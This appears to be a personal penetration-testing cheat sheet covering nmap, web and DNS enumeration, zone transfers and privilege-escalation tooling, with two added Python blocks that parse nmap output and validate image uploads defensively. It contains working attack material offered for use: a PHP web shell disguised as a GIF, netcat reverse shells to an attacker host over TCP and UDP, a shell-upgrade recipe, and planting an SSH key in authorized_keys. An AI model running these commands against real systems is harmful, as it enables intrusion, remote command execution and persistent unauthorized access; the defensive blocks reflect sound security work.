
Intended for personal use: I pull commands from many websites and from pages of my own blog, and I just want to have all of them on one cozy page.
Enumeration
Port
nmap
Simple, quick and dirty, with OS and version detection:
nmap -A -O -v -T4 X.X.X.X
A more complete one:
nmap -sV -sC -oA tcpnmap X.X.X.X
A custom one to see if there are some unusual ports open:
nmap -A -O -v -T4 --top-ports 5000 -oA tcptop5000nmap X.X.X.X
UDP:
nmap -sU -oA udpnmap X.X.X.X
P.S. Add -p- to scan all ports (take a break and go make a sandwich).
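The -oA prefix used above writes three files (tcpnmap.nmap, tcpnmap.gnmap and tcpnmap.xml). The following is an added example, not code from the original page: it parses the greppable .gnmap form and flags open ports that are not on an approved baseline for that host, which is the defender's use of the very same scan (scan your own hosts, diff against what should be listening). The sample .gnmap text, the address 10.0.0.5 and the baseline are constructed for the example.

```python
"""Parse nmap greppable output (.gnmap) and flag open ports that are not on an
approved baseline. Added example, not from the original page."""
from typing import Dict, List, NamedTuple, Set, Tuple


class PortEntry(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


# Constructed sample of what "nmap -sV -sC -oA tcpnmap 10.0.0.5" would leave in
# tcpnmap.gnmap. Not real scan output.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -sV -sC -oA tcpnmap 10.0.0.5\n"
    "Host: 10.0.0.5 ()\tStatus: Up\n"
    "Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu/, "
    "80/open/tcp//http//Apache httpd 2.4.41/, 8081/open/tcp//blackice-icecap///, "
    "443/filtered/tcp//https///\tIgnored State: closed (996)\n"
    "# Nmap done at ...\n"
)

# Constructed baseline: (port, proto) pairs that are supposed to be listening.
BASELINE: Dict[str, Set[Tuple[int, str]]] = {"10.0.0.5": {(22, "tcp"), (80, "tcp")}}


def parse_gnmap(text: str) -> Dict[str, List[PortEntry]]:
    """Return {ip: [PortEntry, ...]} from the 'Host: ... Ports: ...' lines.

    Each port item has seven slash-separated fields:
    port/state/proto/owner/service/rpc info/version/
    """
    hosts: Dict[str, List[PortEntry]] = {}
    for line in text.splitlines():
        if not line.startswith("Host: ") or "\tPorts: " not in line:
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        ports_field = next(f for f in fields if f.startswith("Ports: "))[len("Ports: "):]
        entries = hosts.setdefault(ip, [])
        for item in ports_field.split(", "):
            parts = item.strip().split("/")
            if len(parts) < 7:
                continue  # malformed item; skip rather than crash on odd output
            entries.append(PortEntry(int(parts[0]), parts[2], parts[1], parts[4], parts[6]))
    return hosts


def unexpected_open_ports(hosts: Dict[str, List[PortEntry]],
                          baseline: Dict[str, Set[Tuple[int, str]]]) -> Dict[str, List[PortEntry]]:
    """Open ports per host that the baseline does not approve of."""
    out: Dict[str, List[PortEntry]] = {}
    for ip, entries in hosts.items():
        allowed = baseline.get(ip, set())
        bad = [e for e in entries if e.state == "open" and (e.port, e.proto) not in allowed]
        if bad:
            out[ip] = bad
    return out


if __name__ == "__main__":
    for ip, bad in unexpected_open_ports(parse_gnmap(SAMPLE_GNMAP), BASELINE).items():
        for e in bad:
            print(f"{ip}: unexpected {e.port}/{e.proto} ({e.service} {e.version})")
```

On the constructed sample this reports 8081/tcp, the one listener the baseline does not know about; the filtered 443 is ignored because only open ports are compared.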
Webservice
Nikto
nikto -h X.X.X.X
Uniscan
uniscan -u http://X.X.X.X/ -qweds
Dirbuster
Start the GUI:
dirbuster
Most used wordlist:
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Dirb
dirb http://X.X.X.X /usr/share/dirb/wordlists/common.txt
(also big.txt is interesting)
Dirsearch
git clone http://github.com/maurosoria/dirsearch
python3 dirsearch.py -u http://X.X.X.X -e php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f -t 20
-f force extensions
-r recursive (if needed)
Wpscan
wpscan --url http://X.X.X.X/wordpress --enumerate u vp vt
droopescan
Up-to-date Drupal scanner:
droopescan scan drupal -u X.X.X.X
Burp
…
Enum4linux
For extensive enumeration with enum4linux:
enum4linux -a -o -n -v X.X.X.X
DNS
NSLOOKUP
nslookup
> SERVER X.X.X.X
> 127.0.0.1
Server: ...
Address: ...
> X.X.X.X
Server: ...
Address: ...
> box.com
Server: ...
Address: ...
Name: box.com
Address: X.X.X.X
dnsrecon
Reverse lookup brute force:
dnsrecon -r 127.0.0.0/24 -n X.X.X.X
dnsrecon -r 127.0.1.0/24 -n X.X.X.X
dnsrecon -r X.X.X.0/24 -n X.X.X.X
DNS zone transfer
Zone transfer attempt:
dig axfr @X.X.X.X
We can get a few extra subdomains (the zone's records):
dig axfr box.com @X.X.X.X
Add a DNS server
Edit /etc/resolv.conf and add:
nameserver X.X.X.X
Reverse Shell
To test
GIF to upload for the test, with these contents:
GIF8 <?php echo system($_REQUEST['command']); ?>
Then request it with a command:
xxxx.gif?command=id
If it works:
xxxx.gif?command=nc -e /bin/sh KALIIP 8081
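The upload trick above works because the application trusts a filename ending in .gif and, at most, a few leading bytes. The following is an added example, not code from the original page: a server-side validator that rejects the page's payload (its signature "GIF8 " is not a real GIF signature), rejects double extensions, and also rejects a file that carries a genuine GIF header with PHP smuggled in before the trailer, which a magic-bytes check alone would let through. The sample files are constructed inline; the function and constant names are this example's own.

```python
"""Server-side checks against GIF/PHP polyglot uploads.
Added example, not from the original page. Pure Python, no image library needed."""
import re
from typing import Tuple

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
# Markers that never belong inside an image file handed to a PHP/ASP/JS stack.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")

# --- constructed test inputs (not real uploads) -----------------------------
# The payload shown on the page: "GIF8" plus a space, then PHP.
PAGE_PAYLOAD = b"GIF8 <?php echo system($_REQUEST['command']); ?>"
# A minimal, genuine 1x1 GIF89a.
MINIMAL_GIF = (
    b"GIF89a\x01\x00\x01\x00\x00\x00\x00"        # signature + logical screen descriptor
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor, 1x1 pixel
    b"\x02\x02\x44\x01\x00"                       # LZW image data
    b"\x3b"                                       # trailer
)
# Real GIF header with a harmless PHP marker inserted before the trailer:
# passes a magic-bytes check, so the content scan has to catch it.
POLYGLOT_GIF = MINIMAL_GIF[:-1] + b"<?php echo 'x'; ?>" + b"\x3b"


def looks_like_gif(data: bytes) -> bool:
    """Structural sanity: 6-byte signature, room for the 7-byte logical screen
    descriptor, and the 0x3B trailer byte at the end."""
    if len(data) < 13 or data[:6] not in GIF_SIGNATURES:
        return False
    return data[-1] == 0x3B


def contains_script_marker(data: bytes) -> bool:
    """Case-insensitive scan of the whole file, comments and trailing bytes included."""
    lowered = data.lower()
    return any(marker in lowered for marker in SCRIPT_MARKERS)


def safe_filename(filename: str) -> bool:
    """One plain name, one allow-listed extension: 'shell.php.gif' is refused."""
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.gif", filename) is not None


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an upload that claims to be a GIF."""
    if not safe_filename(filename):
        return False, "filename must be a plain name ending in .gif"
    if not looks_like_gif(data):
        return False, "not a well-formed GIF"
    if contains_script_marker(data):
        return False, "script marker inside image data"
    return True, "ok"


if __name__ == "__main__":
    for name, blob in (("xxxx.gif", PAGE_PAYLOAD), ("cat.gif", MINIMAL_GIF),
                       ("cat.gif", POLYGLOT_GIF), ("shell.php.gif", MINIMAL_GIF)):
        print(name, validate_upload(name, blob))
```

These checks only decide whether to keep the file. The mitigation that actually defeats the trick is storing uploads where the web server will not execute them (outside the document root, or with script execution disabled for that directory), and re-encoding accepted images so that nothing from the original bytes survives.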
netcat
TCP
On kali box : nc -lvnp 8081
nc -e /bin/sh KALIIP 8081
UDP
(need to check whether -e works together with -u)
On kali box : nc -u -lvnp 8081
nc -u -e /bin/sh KALIIP 8081
To have a full shell:
python -c 'import pty;pty.spawn("/bin/bash");'
Background it with CTRL+Z, then in your own terminal:
stty raw -echo
fg [enter]
(sometimes you then need to type the command bash)
Create an SSH key pair
ssh-keygen (when asked for the path, enter /root/ssh_key)
The generated public key (ssh_key.pub) needs to be put on the server in:
/home/user/.ssh/authorized_keys
To connect:
ssh -i ssh_key user@X.X.X.X
Useful links:
Privilege Escalation
LinEnum.sh
linuxprivchecker.py
unixprivesc.sh
sudo info
To see if the user can run commands with sudo:
sudo -l
To see the version of sudo:
dpkg -l sudo
Open an exploit directly from searchsploit (-x examines it):
searchsploit -x (put the path)
…